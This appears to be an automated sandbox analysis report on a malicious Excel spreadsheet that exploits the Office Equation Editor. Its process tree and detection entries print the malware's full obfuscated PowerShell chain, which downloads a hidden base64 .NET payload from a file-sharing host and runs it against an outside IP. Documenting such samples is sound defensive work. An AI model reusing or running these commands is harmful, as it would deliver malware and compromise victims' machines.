Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fUHl7rElXU.xlsx

Overview

General Information

Sample name:fUHl7rElXU.xlsx
renamed because original name is a hash value
Original sample name:b95a8f60a0db34e77e88eee9fc34f2f057f31f9eb1bc66fa292cbe7e5e697428.xlsx
Analysis ID:1568171
MD5:ce37f3ed03a2664795b50ad1966b81e8
SHA1:34636b9da429754b4c21cae7c78688e4a79040d1
SHA256:b95a8f60a0db34e77e88eee9fc34f2f057f31f9eb1bc66fa292cbe7e5e697428
Tags:bklpyseyeut4impw50n1xlsxuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Yara detected VBS Downloader Generic
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Document exploit detected (process start blacklist hit)
Installs new ROOT certificates
Obfuscated command line found
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3236 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 3444 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3588 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningmecccmedicallaboratory.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3660 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFBzSE9NZVs0XSskUHNIT01FWzM0XSsneCcpICgoJ3pZdmltYWdlVXJsID0gdmZjaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmknKydsZS9nZXQ/ZmlsZWtleT0yQWEnKydfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMScrJzczMDk0NTE3NmEwOTA0ZiB2ZmM7ell2d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt6WXZpbWFnZUJ5dGVzID0gell2d2ViQ2xpZW50LkRvd25sb2FkRGF0YSh6WXZpbWFnZVVybCk7ell2aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTonKyc6VVRGOC5HZXRTdHJpbmcoell2aW1hZ2VCeXRlcyk7ell2c3RhcnRGbGFnID0gdmZjPDxCQVNFNjRfU1RBUlQnKyc+JysnPnZmYzsnKyd6WXZlbmRGbGFnID0gdmZjPDxCQVNFNjRfRU5EPj52ZmM7ell2c3RhcnRJbmRleCA9IHpZdmltYWdlVGV4dC5JbmRleE9mKHpZdnN0YXJ0RmxhZyk7ell2ZW5kSW5kZScrJ3ggPSB6WXZpbWFnZVRleHQuSW5kZXhPJysnZih6WXYnKydlbmRGbGFnKTt6WXZzdGFydEluZGV4IC1nZSAwIC1hbmQgell2ZW5kSW5kZXggLWd0IHpZdnN0YXJ0SW5kZXg7ell2c3RhcnRJbmRleCArPSB6WXZzdGFydEZsYWcuTGVuZ3RoOycrJ3pZdmJhc2U2NExlbmd0aCA9IHpZdmVuZEluZGV4IC0gell2c3RhcnRJbmRleDt6WXZiYXNlNjRDb21tYW5kID0gell2JysnaW1hZ2VUZXh0LlN1YnN0cmluZyh6WXZzdGFydEluZGV4LCB6WXZiYXNlNjRMZW5ndCcrJ2gpO3pZdmJhc2U2NFJldmVyc2VkID0gLWpvaW4nKycgKHpZdmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBHb2EgRm9yRWFjaC1PYmplY3QgeyAnKyd6WXYnKydfIH0pWy0xLi4tKHpZdmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07ell2Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh6WXZiYXNlNjRSZXZlcnNlZCk7ell2bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOicrJzpMb2FkKHpZdmNvbW1hbmRCeXQnKydlcyk7ell2dmFpJysnTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh2ZmNWQUl2ZmMpO3pZdnZhaU1ldGhvZC5JbnZva2Uoell2bnVsbCwgQCh2ZmN0eHQuNDU0NDY1NjU0M21tYWRhbWJld2FhYWFhYWFhYXNub2YvOTEuNy44NjEuNDAxLy86cHR0aHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjTVMnKydCdWlsZHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYyx2ZmNkZXNhdGl2YWRvdmZjLHZmY2Rlc2F0aXZhZCcrJ292ZmMsdicrJ2ZjZGVzYScrJ3RpdmFkb3ZmJysnYyx2ZmNkZXNhdCcrJ2l2YWRvdmZjLHZmY2Rlc2F0aXZhZG92ZmMsdmZjMXZmYyx2ZmNkZXNhdGl2YWRvdmZjKSk7JykuUkVQbEFjRSgnR29hJywnfCcpLlJFUGxBY0UoJ3pZdicsJyQnKS5SRVBsQWNFKCd2ZmMnLFtTdFJpbmddW0NoYXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $PsHOMe[4]+$PsHOME[34]+'x') (('zYvimageUrl = vfchttps://1017.filemail.com/api/fi'+'le/get?filekey=2Aa'+'_bWo9Reu45t7'+'BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1'+'730945176a0904f vfc;zYvwebClient = New-Ob'+'ject System.Net.WebClient;zYvimageBytes = zYvwebClient.DownloadData(zYvimageUrl);zYvimageText = [System.Text.Encoding]:'+':UTF8.GetString(zYvimageBytes);zYvstartFlag = vfc<<BASE64_START'+'>'+'>vfc;'+'zYvendFlag = vfc<<BASE64_END>>vfc;zYvstartIndex = zYvimageText.IndexOf(zYvstartFlag);zYvendInde'+'x = zYvimageText.IndexO'+'f(zYv'+'endFlag);zYvstartIndex -ge 0 -and zYvendIndex -gt zYvstartIndex;zYvstartIndex += zYvstartFlag.Length;'+'zYvbase64Length = zYvendIndex - zYvstartIndex;zYvbase64Command = zYv'+'imageText.Substring(zYvstartIndex, zYvbase64Lengt'+'h);zYvbase64Reversed = -join'+' (zYvbase64Command.ToCharArray() Goa ForEach-Object { '+'zYv'+'_ })[-1..-(zYvbase64Command.Length)];zYvcommandBytes = [System.Convert]::FromBase64String(zYvbase64Reversed);zYvloadedAssembly = [System.Reflection.Assembly]:'+':Load(zYvcommandByt'+'es);zYvvai'+'Method = [dnlib.IO.Home].GetMethod(vfcVAIvfc);zYvvaiMethod.Invoke(zYvnull, @(vfctxt.4544656543mmadambewaaaaaaaaasnof/91.7.861.401//:ptthvfc, vfcdesativadovfc, vfcdesativadovfc, vfcdesativadovfc, vfcMS'+'Buildvfc, vfcdesativadovfc, vfcdesativadovfc,vfcdesativadovfc,vfcdesativad'+'ovfc,v'+'fcdesa'+'tivadovf'+'c,vfcdesat'+'ivadovfc,vfcdesativadovfc,vfc1vfc,vfcdesativadovfc));').REPlAcE('Goa','|').REPlAcE('zYv','$').REPlAcE('vfc',[StRing][Char]39))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x1bd2:$s1: <legacyDrawing r:id="
  • 0x1bfa:$s2: <oleObject progId="
  • 0x1c34:$s3: autoLoad="true"

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\eveningmecccmedicallaboratory.vbsJoeSecurity_VBS_Downloader_GenericYara detected VBS Downloader GenericJoe Security
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\webmadamMPDW-constraints[1].vbsJoeSecurity_VBS_Downloader_GenericYara detected VBS Downloader GenericJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      Process Memory Space: powershell.exe PID: 3660INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0xbaf8e:$b2: ::FromBase64String(
      • 0x110a89:$b2: ::FromBase64String(
      • 0x11108e:$b2: ::FromBase64String(
      • 0x111a8f:$b2: ::FromBase64String(
      • 0x112ba6:$b2: ::FromBase64String(
      • 0x1132a5:$b2: ::FromBase64String(
      • 0x113b39:$b2: ::FromBase64String(
      • 0x1141bd:$b2: ::FromBase64String(
      • 0x3b36:$b3: ::UTF8.GetString(
      • 0x44d0:$b3: ::UTF8.GetString(
      • 0x4dd7:$b3: ::UTF8.GetString(
      • 0x229e0:$b3: ::UTF8.GetString(
      • 0x232e0:$b3: ::UTF8.GetString(
      • 0x2476b:$b3: ::UTF8.GetString(
      • 0x4135a:$b3: ::UTF8.GetString(
      • 0x86958:$b3: ::UTF8.GetString(
      • 0x873b9:$b3: ::UTF8.GetString(
      • 0x88146:$b3: ::UTF8.GetString(
      • 0x88a4d:$b3: ::UTF8.GetString(
      • 0x8950b:$b3: ::UTF8.GetString(
      • 0x89fb9:$b3: ::UTF8.GetString(
      Process Memory Space: powershell.exe PID: 3768JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 3768INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x16d0:$b2: ::FromBase64String(
        • 0x976b:$b2: ::FromBase64String(
        • 0xe4f4:$b2: ::FromBase64String(
        • 0xeb73:$b2: ::FromBase64String(
        • 0xf402:$b2: ::FromBase64String(
        • 0xfc42:$b2: ::FromBase64String(
        • 0x2e091:$b2: ::FromBase64String(
        • 0x2ef15:$b2: ::FromBase64String(
        • 0x2f599:$b2: ::FromBase64String(
        • 0x3b0ea:$b2: ::FromBase64String(
        • 0xb7d6f:$b2: ::FromBase64String(
        • 0xb83e7:$b2: ::FromBase64String(
        • 0xf4697:$b2: ::FromBase64String(
        • 0x10caf1:$b2: ::FromBase64String(
        • 0x10d16a:$b2: ::FromBase64String(
        • 0x10e6da:$b2: ::FromBase64String(
        • 0x113cfa:$b2: ::FromBase64String(
        • 0x114ce1:$b2: ::FromBase64String(
        • 0x116543:$b2: ::FromBase64String(
        • 0x14efd6:$b2: ::FromBase64String(
        • 0x14f747:$b2: ::FromBase64String(

        Sigma Signatures

        Exploits

        barindex
        Sigma detected: EQNEDT32.EXE connecting to internet
        Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 104.168.7.19, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3444, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
        Sigma detected: File Dropped By EQNEDT32EXE
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3444, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\webmadamMPDW-constraints[1].vbs

        System Summary

        barindex
        Sigma detected: Base64 Encoded PowerShell Command Detected
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFBzSE9NZVs0XSskUHNIT01FWzM0XSsneCcpICgoJ3pZdmltYWdlVXJsID0gdmZjaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmknKydsZS9nZXQ/ZmlsZWtleT0yQWEnKydfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMScrJzczMDk0NTE3NmEwOTA0ZiB2ZmM7ell2d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt6WXZpbWFnZUJ5dGVzID0gell2d2ViQ2xpZW50LkRvd25sb2FkRGF0YSh6WXZpbWFnZVVybCk7ell2aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTonKyc6VVRGOC5HZXRTdHJpbmcoell2aW1hZ2VCeXRlcyk7ell2c3RhcnRGbGFnID0gdmZjPDxCQVNFNjRfU1RBUlQnKyc+JysnPnZmYzsnKyd6WXZlbmRGbGFnID0gdmZjPDxCQVNFNjRfRU5EPj52ZmM7ell2c3RhcnRJbmRleCA9IHpZdmltYWdlVGV4dC5JbmRleE9mKHpZdnN0YXJ0RmxhZyk7ell2ZW5kSW5kZScrJ3ggPSB6WXZpbWFnZVRleHQuSW5kZXhPJysnZih6WXYnKydlbmRGbGFnKTt6WXZzdGFydEluZGV4IC1nZSAwIC1hbmQgell2ZW5kSW5kZXggLWd0IHpZdnN0YXJ0SW5kZXg7ell2c3RhcnRJbmRleCArPSB6WXZzdGFydEZsYWcuTGVuZ3RoOycrJ3pZdmJhc2U2NExlbmd0aCA9IHpZdmVuZEluZGV4IC0gell2c3RhcnRJbmRleDt6WXZiYXNlNjRDb21tYW5kID0gell2JysnaW1hZ2VUZXh0LlN1YnN0cmluZyh6WXZzdGFydEluZGV4LCB6WXZiYXNlNjRMZW5ndCcrJ2gpO3pZdmJhc2U2NFJldmVyc2VkID0gLWpvaW4nKycgKHpZdmJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBHb2EgRm9yRWFjaC1PYmplY3QgeyAnKyd6WXYnKydfIH0pWy0xLi4tKHpZdmJhc2U2NENvbW1hbmQuTGVuZ3RoKV07ell2Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh6WXZiYXNlNjRSZXZlcnNlZCk7ell2bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOicrJzpMb2FkKHpZdmNvbW1hbmRCeXQnKydlcyk7ell2dmFpJysnTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh2ZmNWQUl2ZmMpO3pZdnZhaU1ldGhvZC5JbnZva2Uoell2bnVsbCwgQCh2ZmN0eHQuNDU0NDY1NjU0M21tYWRhbWJld2FhYWFhYWFhYXNub2YvOTEuNy44NjEuNDAxLy86cHR0aHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjTVMnKydCdWlsZHZmYywgdmZjZGVzYXRpdmFkb3ZmYywgdmZjZGVzYXRpdmFkb3ZmYyx2ZmNkZXNhdGl2YWRvdmZjLHZmY2Rlc2F0aXZhZCcrJ292ZmMsdicrJ2ZjZGVzYScrJ3RpdmFkb3ZmJysnYyx2ZmNkZXNhdCcrJ2l2YWRvdmZjLHZmY2Rlc2F0aXZhZG92ZmMsdmZjMXZmYyx2ZmNkZXNhdGl2YWRvdmZjKSk7JykuUkVQbEFjRSgnR29hJywnfCcpLlJFUGxBY0UoJ3pZdicsJyQnKS5SRVBsQWNFKCd2ZmMnLFtTdFJpbmddW0NoYXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFBzSE9NZVs0XSskUHNIT01FWzM0XSsneCcpICgoJ3pZdmltYWdlVXJsID0gdmZjaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmknKydsZS9nZXQ/ZmlsZWtleT0yQWEnKydfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMScrJzczMDk0NTE3NmEwOTA0ZiB2ZmM7ell2d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt6WXZpbWFnZUJ5dGVzID0gell2d2ViQ2xpZW50LkRvd25sb2FkRGF0YSh6WXZpbWFnZVVybCk7ell2aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTonKyc6VVRGOC5HZXRTdHJpbmcoell2aW1hZ2VCeXRlcyk7ell2c3RhcnRGbGFnID0gdmZjPDxCQVNFNjRfU1RBUlQn
        Sigma detected: Equation Editor Network Connection
        Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3444, Protocol: tcp, SourceIp: 104.168.7.19, SourceIsIpv6: false, SourcePort: 80
        Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
        Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $PsHOMe[4]+$PsHOME[34]+'x') (('zYvimageUrl = vfchttps://1017.filemail.com/api/fi'+'le/get?filekey=2Aa'+'_bWo9Reu45t7'+'BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1'+'730945176a0904f vfc;zYvwebClient = New-Ob'+'ject System.Net.WebClient;zYvimageBytes = zYvwebClient.DownloadData(zYvimageUrl);zYvimageText = [System.Text.Encoding]:'+':UTF8.GetString(zYvimageBytes);zYvstartFlag = vfc<<BASE64_START'+'>'+'>vfc;'+'zYvendFlag = vfc<<BASE64_END>>vfc;zYvstartIndex = zYvimageText.IndexOf(zYvstartFlag);zYvendInde'+'x = zYvimageText.IndexO'+'f(zYv'+'endFlag);zYvstartIndex -ge 0 -and zYvendIndex -gt zYvstartIndex;zYvstartIndex += zYvstartFlag.Length;'+'zYvbase64Length = zYvendIndex - zYvstartIndex;zYvbase64Command = zYv'+'imageText.Substring(zYvstartIndex, zYvbase64Lengt'+'h);zYvbase64Reversed = -join'+' (zYvbase64Command.ToCharArray() Goa ForEach-Object { '+'zYv'+'_ })[-1..-(zYvbase64Command.Length)];zYvcommandBytes = [System.Convert]::FromBase64String(zYvbase64Reversed);zYvloadedAssembly = [System.Reflection.Assembly]:'+':Load(zYvcommandByt'+'es);zYvvai'+'Method = [dnlib.IO.Home].GetMethod(vfcVAIvfc);zYvvaiMethod.Invoke(zYvnull, @(vfctxt.4544656543mmadambewaaaaaaaaasnof/91.7.861.401//:ptthvfc, vfcdesativadovfc, vfcdesativadovfc, vfcdesativadovfc, vfcMS'+'Buildvfc, vfcdesativadovfc, vfcdesativadovfc,vfcdesativadovfc,vfcdesativad'+'ovfc,v'+'fcdesa'+'tivadovf'+'c,vfcdesat'+'ivadovfc,vfcdesativadovfc,vfc1vfc,vfcdesativadovfc));').REPlAcE('Goa','|').REPlAcE('zYv','$').REPlAcE('vfc',[StRing][Char]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $PsHOMe[4]+$PsHOME[34]+'x') (('zYvimageUrl = vfchttps://1017.filemail.com/api/fi'+'le/get?filekey=2Aa'+'_bWo9Reu45t7'+'BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1'+'730945176a0904f vfc;zYvwebClient = New-Ob'+'ject System.Net.WebClient;zYvimageBytes = zYvwebClient.DownloadData(zYvimageUrl);zYvimageText = [System.Text.Encoding]:'+':UTF8.GetString(zYvimageBytes);zYvstartFlag = vfc<<BASE64_START'+'>'+'>vfc;'+'zYvendFlag = vfc<<BASE64_END>>vfc;zYvstartIndex = zYvimageText.IndexOf(zYvstartFlag);zYvendInde'+'x = zYvimageText.IndexO'+'f(zYv'+'endFlag);zYvstartIndex -ge 0 -and zYvendIndex -gt zYvstartIndex;zYvstartIndex += zYvstartFlag.Length;'+'zYvbase64Length = zYvendIndex - zYvstartIndex;zYvbase64Command = zYv'+'imageText.Substring(zYvstartIndex, zYvbase64Lengt'+'h);zYvbase64Reversed = -join'+' (zYvbase64Command.ToCharArray() Goa ForEach-Object { '+'zYv'+'_ })[-1..-(zYvbase64Command.Length)];zYvcommandBytes = [System.Convert]::FromBase64String(zYvbase64Reversed);zYvloadedAssembly = [System.Reflection.Assembly]:'+':Load(zYvcommandByt'+'es);zYvvai'+'Method = [dnlib.IO.Home].GetMethod(vfcVAIvfc);zYvvaiMethod.Invoke(zYvnull, @(vfctxt.454
        Sigma detected: Potential PowerShell Command Line Obfuscation
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $PsHOMe[4]+$PsHOME[34]+'x') (('zYvimageUrl = vfchttps://1017.filemail.com/api/fi'+'le/get?filekey=2Aa'+'_bWo9Reu45t7'+'BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1'+'730945176a0904f vfc;zYvwebClient = New-Ob'+'ject System.Net.WebClient;zYvimageBytes = zYvwebClient.DownloadData(zYvimageUrl);zYvimageText = [System.Text.Encoding]:'+':UTF8.GetString(zYvimageBytes);zYvstartFlag = vfc<<BASE64_START'+'>'+'>vfc;'+'zYvendFlag = vfc<<BASE64_END>>vfc;zYvstartIndex = zYvimageText.IndexOf(zYvstartFlag);zYvendInde'+'x = zYvimageText.IndexO'+'f(zYv'+'endFlag);zYvstartIndex -ge 0 -and zYvendIndex -gt zYvstartIndex;zYvstartIndex += zYvstartFlag.Length;'+'zYvbase64Length = zYvendIndex - zYvstartIndex;zYvbase64Command = zYv'+'imageText.Substring(zYvstartIndex, zYvbase64Lengt'+'h);zYvbase64Reversed = -join'+' (zYvbase64Command.ToCharArray() Goa ForEach-Object { '+'zYv'+'_ })[-1..-(zYvbase64Command.Length)];zYvcommandBytes = [System.Convert]::FromBase64String(zYvbase64Reversed);zYvloadedAssembly = [System.Reflection.Assembly]:'+':Load(zYvcommandByt'+'es);zYvvai'+'Method = [dnlib.IO.Home].GetMethod(vfcVAIvfc);zYvvaiMethod.Invoke(zYvnull, @(vfctxt.4544656543mmadambewaaaaaaaaasnof/91.7.861.401//:ptthvfc, vfcdesativadovfc, vfcdesativadovfc, vfcdesativadovfc, vfcMS'+'Buildvfc, vfcdesativadovfc, vfcdesativadovfc,vfcdesativadovfc,vfcdesativad'+'ovfc,v'+'fcdesa'+'tivadovf'+'c,vfcdesat'+'ivadovfc,vfcdesativadovfc,vfc1vfc,vfcdesativadovfc));').REPlAcE('Goa','|').REPlAcE('zYv','$').REPlAcE('vfc',[StRing][Char]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $PsHOMe[4]+$PsHOME[34]+'x') (('zYvimageUrl = vfchttps://1017.filemail.com/api/fi'+'le/get?filekey=2Aa'+'_bWo9Reu45t7'+'BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1'+'730945176a0904f vfc;zYvwebClient = New-Ob'+'ject System.Net.WebClient;zYvimageBytes = zYvwebClient.DownloadData(zYvimageUrl);zYvimageText = [System.Text.Encoding]:'+':UTF8.GetString(zYvimageBytes);zYvstartFlag = vfc<<BASE64_START'+'>'+'>vfc;'+'zYvendFlag = vfc<<BASE64_END>>vfc;zYvstartIndex = zYvimageText.IndexOf(zYvstartFlag);zYvendInde'+'x = zYvimageText.IndexO'+'f(zYv'+'endFlag);zYvstartIndex -ge 0 -and zYvendIndex -gt zYvstartIndex;zYvstartIndex += zYvstartFlag.Length;'+'zYvbase64Length = zYvendIndex - zYvstartIndex;zYvbase64Command = zYv'+'imageText.Substring(zYvstartIndex, zYvbase64Lengt'+'h);zYvbase64Reversed = -join'+' (zYvbase64Command.ToCharArray() Goa ForEach-Object { '+'zYv'+'_ })[-1..-(zYvbase64Command.Length)];zYvcommandBytes = [System.Convert]::FromBase64String(zYvbase64Reversed);zYvloadedAssembly = [System.Reflection.Assembly]:'+':Load(zYvcommandByt'+'es);zYvvai'+'Method = [dnlib.IO.Home].GetMethod(vfcVAIvfc);zYvvaiMethod.Invoke(zYvnull, @(vfctxt.454
        Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $PsHOMe[4]+$PsHOME[34]+'x') (('zYvimageUrl = vfchttps://1017.filemail.com/api/fi'+'le/get?filekey=2Aa'+'_bWo9Reu45t7'+'BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1'+'730945176a0904f vfc;zYvwebClient = New-Ob'+'ject System.Net.WebClient;zYvimageBytes = zYvwebClient.DownloadData(zYvimageUrl);zYvimageText = [System.Text.Encoding]:'+':UTF8.GetString(zYvimageBytes);zYvstartFlag = vfc<<BASE64_START'+'>'+'>vfc;'+'zYvendFlag = vfc<<BASE64_END>>vfc;zYvstartIndex = zYvimageText.IndexOf(zYvstartFlag);zYvendInde'+'x = zYvimageText.IndexO'+'f(zYv'+'endFlag);zYvstartIndex -ge 0 -and zYvendIndex -gt zYvstartIndex;zYvstartIndex += zYvstartFlag.Length;'+'zYvbase64Length = zYvendIndex - zYvstartIndex;zYvbase64Command = zYv'+'imageText.Substring(zYvstartIndex, zYvbase64Lengt'+'h);zYvbase64Reversed = -join'+' (zYvbase64Command.ToCharArray() Goa ForEach-Object { '+'zYv'+'_ })[-1..-(zYvbase64Command.Length)];zYvcommandBytes = [System.Convert]::FromBase64String(zYvbase64Reversed);zYvloadedAssembly = 